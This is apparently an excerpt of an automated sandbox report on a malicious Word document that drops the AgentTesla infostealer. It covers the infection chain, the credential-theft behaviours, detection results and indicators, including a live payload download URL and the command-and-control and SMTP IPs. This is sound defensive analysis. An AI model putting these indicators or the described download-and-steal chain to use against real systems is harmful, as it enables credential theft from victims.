                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Queries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Queries volume information: C:\Users\user\AppData\Roaming\taskmg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: Yara match | File source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Remote Access Functionality:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.taskmg.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.396b420.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.39a1640.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.39a1640.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.taskmg.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.taskmg.exe.396b420.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: taskmg.exe PID: 2784, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Windows Management Instrumentation 211 | Scheduled Task/Job 1 | Process Injection 211 | Disable or Modify Tools 11 | OS Credential Dumping 2 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scripting 3 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 3 | Security Account Manager | Security Software Discovery 311 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | Exploitation for Client Execution 33 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture 11 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | Carrier Billing Fraud |
                    Cloud Accounts | Command and Scripting Interpreter 11 | Network Logon Script | Network Logon Script | Software Packing 13 | LSA Secrets | Virtualization/Sandbox Evasion 131 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 32 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                    Replication Through Removable Media | Scheduled Task/Job 1 | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                    External Remote Services | PowerShell 3 | Startup Items | Startup Items | Virtualization/Sandbox Evasion 131 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 211 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

                    Behavior Graph


                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 528737 | Sample: Reconfirm The Details.doc | Startdate: 25/11/2021 | Architecture: WINDOWS | Score: 100
                    Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Sigma detected: Powershell download and execute file; 20 other signatures
                    • WINWORD.EXE 306 47
                      DNS/IP: 173.232.204.89, 49165, 49166, 80 EONIX-COMMUNICATIONS-ASBLOCK-62904US United States
                      Dropped: C:\Users\user\AppData\Local\...\taskmg[1].exe, PE32; C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data; C:\Users\user\AppData\Local\...\3263CED7.png, 370
                      Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); Microsoft Office creates scripting files
                      • powershell.exe 12 7
                        Dropped: C:\Users\user\AppData\Roaming\taskmg.exe, PE32
                        Signatures: Powershell drops PE file
                        • taskmg.exe 3
                          Dropped: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, PE32; C:\Users\user\AppData\Local\...\tmp3054.tmp, XML
                          Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
                          • taskmg.exe 10
                            DNS/IP: 208.91.198.143, 49174, 587 PUBLIC-DOMAIN-REGISTRYUS United States; 208.91.199.223, 49169, 587 PUBLIC-DOMAIN-REGISTRYUS United States; 2 other IPs or domains
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                          • powershell.exe 6
                          • schtasks.exe
                      • notepad.exe
                        Signatures: Injects files into Windows application
                      • powershell.exe 7
                      • 2 other processes

                    Screenshots


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

Source | Detection | Scanner | Label
Reconfirm The Details.doc | 30% | ReversingLabs | Script.Trojan.RTFObfustream

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

Source | Detection | Scanner | Label
14.0.taskmg.exe.400000.13.unpack | 100% | Avira | TR/Spy.Gen8
14.0.taskmg.exe.400000.9.unpack | 100% | Avira | TR/Spy.Gen8
14.2.taskmg.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1143187
14.0.taskmg.exe.400000.11.unpack | 100% | Avira | TR/Spy.Gen8
14.0.taskmg.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen8
14.0.taskmg.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen8

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://java.co_w | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
httP://173.232.2 | 0% | Avira URL Cloud | safe
httP://173.232.204.89/taskmg. | 0% | Avira URL Cloud | safe
http://EW9kaPSTVWDzFNsliGsC.org(Zgt | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
httP://173.232.204.89/t | 0% | Avira URL Cloud | safe
http://173.232.204.89/taskmg.exe | 0% | Avira URL Cloud | safe
http://173.232.204.89 | 0% | Avira URL Cloud | safe
http://EW9kaPSTVWDzFNsliGsC.org | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
httP://173.232 | 0% | Avira URL Cloud | safe
http://GwvXXB.com | 0% | Avira URL Cloud | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
httP://173.232.204.89/taskmg.exePE | 0% | Avira URL Cloud | safe
http://java.cohe | 0% | Avira URL Cloud | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.224 | true | false | - | high

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://173.232.204.89/taskmg.exe | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://java.co_w | powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
httP://173.232.2 | powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmp | false | - | high
httP://173.232.204.89/taskmg. | powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://EW9kaPSTVWDzFNsliGsC.org(Zgt | taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
httP://173.232.204.89/t | powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://173.232.204.89 | powershell.exe, 00000003.00000002.430015540.0000000003749000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
httP://173.232.204.89/taskmg.exe | powershell.exe, 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.418277171.000000000019E000.00000004.00000020.sdmp, powershell.exe, 00000005.00000002.419023647.0000000002C91000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.418378144.00000000004A4000.00000004.00000040.sdmp | true | - | unknown
http://EW9kaPSTVWDzFNsliGsC.org | taskmg.exe, 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://www.%s.comPA | powershell.exe, 00000003.00000002.424369467.0000000002510000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.418546129.0000000002210000.00000002.00020000.sdmp, taskmg.exe, 00000009.00000002.447397125.00000000057A0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
httP://173.232 | powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
http://www.piriform.com/ccleanerv | powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmp | false | - | high
http://GwvXXB.com | taskmg.exe, 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp | false | - | high
https://api.ipify.org% | taskmg.exe, 0000000E.00000002.705002661.00000000027F0000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | taskmg.exe, 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, taskmg.exe, 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://servername/isapibackend.dll | schtasks.exe, 0000000C.00000002.437567787.0000000000740000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
httP://173.232.204.89/taskmg.exePE | powershell.exe, 00000003.00000002.429675159.000000000364C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.420421279.000000000363C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://java.cohe | powershell.exe, 00000003.00000002.423981506.000000000043E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.198.143 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
208.91.199.225 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
208.91.199.223 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
208.91.199.224 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
173.232.204.89 | unknown | United States | 62904 | EONIX-COMMUNICATIONS-ASBLOCK-62904US | true

                              General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528737
Start date: 25.11.2021
Start time: 18:14:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Reconfirm The Details.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@21/27@9/5
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
18:14:21 | API Interceptor | 107x Sleep call for process: powershell.exe modified
18:14:27 | API Interceptor | 1096x Sleep call for process: taskmg.exe modified
18:14:33 | API Interceptor | 1x Sleep call for process: schtasks.exe modified

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | Detection
208.91.198.143 | Document.exe | malicious
 | MT_101_SWIFT.doc | malicious
 | Purchase Order PO#7701.exe | malicious
 | TNT E-Invoice No 11073490.exe | malicious
 | E invoice.exe | malicious
 | UY2021 Ta-Ho Maritime Schedule.exe | malicious
 | PNkBekAKOeQD1Jj.exe | malicious
 | PRESUPUESTO.xlsx | malicious
 | DHL Documentos de envio originales.exe | malicious
 | XSsBxQH419.exe | malicious
 | devis.xlsx | malicious
 | Quotation- 306013SQ.exe | malicious
 | PO 4601056018.exe | malicious
 | Purchase Order Vale-60,000MT.exe | malicious
 | BOQ 11745692.exe | malicious
 | dhl_doc9548255382.exe | malicious
 | ADYP_210913_100641_PAGOS_005539.xlsx | malicious
 | Quotation.xlsx | malicious
 | Advice Payment Copy.exe | malicious
 | IMG-20211110-OWA001.exe | malicious
208.91.199.225 | Swift_HSBC_0099087645PDF.exe | malicious
 | P0_636732672772_RFQ.exe | malicious
 | STATEMENT OF ACCOUNT.xlsx | malicious
 | XsFFv27rls.exe | malicious
 | TNT E-Invoice No 11073490.exe | malicious
 | E invoice.exe | malicious
 | Bill of lading.exe | malicious
 | devis.xlsx | malicious
 | dhl_doc9548255382.exe | malicious
 | PO 4601056018.exe | malicious
 | ADYP_210913_100641_PAGOS_005539.xlsx | malicious
 | Quotation.xlsx | malicious
 | Purchase Order 20000MT.exe | malicious
 | Invoice- Shping DOCX.exe | malicious
 | Invoice No ANT19-20646.exe | malicious
 | 8rwaRyxu9W9IUfB.exe | malicious
 | RZB0ljZiQMqYfAw.exe | malicious
 | Shipment Details.exe | malicious
 | urgent order 1065.exe | malicious
 | NEW PURCHASE ORDER LIST NOV2021.exe | malicious

                                                                                                              Domains

Match | Associated Sample Name / URL | Detection | Context
us2.smtp.mailhostbox.com | Document.exe | malicious | 208.91.198.143
 | MT_101_SWIFT.doc | malicious | 208.91.199.225
 | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious | 208.91.199.224
 | DOC221121.exe | malicious | 208.91.199.224
 | Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exe | malicious | 208.91.199.225
 | Swift_HSBC_0099087645PDF.exe | malicious | 208.91.199.225
 | P0_636732672772_RFQ.exe | malicious | 208.91.199.225
 | rTyPU1zmY5PsyNl.exe | malicious | 208.91.199.223
 | DOCUMENTS.exe | malicious | 208.91.199.223
 | Purchase Order PO#7701.exe | malicious | 208.91.198.143
 | STATEMENT OF ACCOUNT.xlsx | malicious | 208.91.199.225
 | XsFFv27rls.exe | malicious | 208.91.199.225
 | TransactionSummary_22-11-2021.exe | malicious | 208.91.199.225
 | TNT E-Invoice No 11073490.exe | malicious | 208.91.198.143
 | E invoice.exe | malicious | 208.91.198.143
 | TOP QUOTATION RFQ 2021.exe | malicious | 208.91.199.223
 | (KOREA SHIPPING - KLCSM).exe | malicious | 208.91.199.224
 | Bill of lading.exe | malicious | 208.91.199.225
 | UY2021 Ta-Ho Maritime Schedule.exe | malicious | 208.91.199.223
 | AWB Number 0004318855.DOCX.exe | malicious | 208.91.199.224

                                                                                                              ASN

Match | Associated Sample Name / URL | Detection | Context
PUBLIC-DOMAIN-REGISTRYUS | Document.exe | malicious | 208.91.199.224
 | Swift Copy TT.doc | malicious | 207.174.212.140
 | MT_101_SWIFT.doc | malicious | 208.91.199.224
 | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious | 208.91.199.224
 | DOC221121.exe | malicious | 208.91.199.224
 | Swift_HSBC_0099087645PDF.exe | malicious | 208.91.199.225
 | P0_636732672772_RFQ.exe | malicious | 208.91.199.225
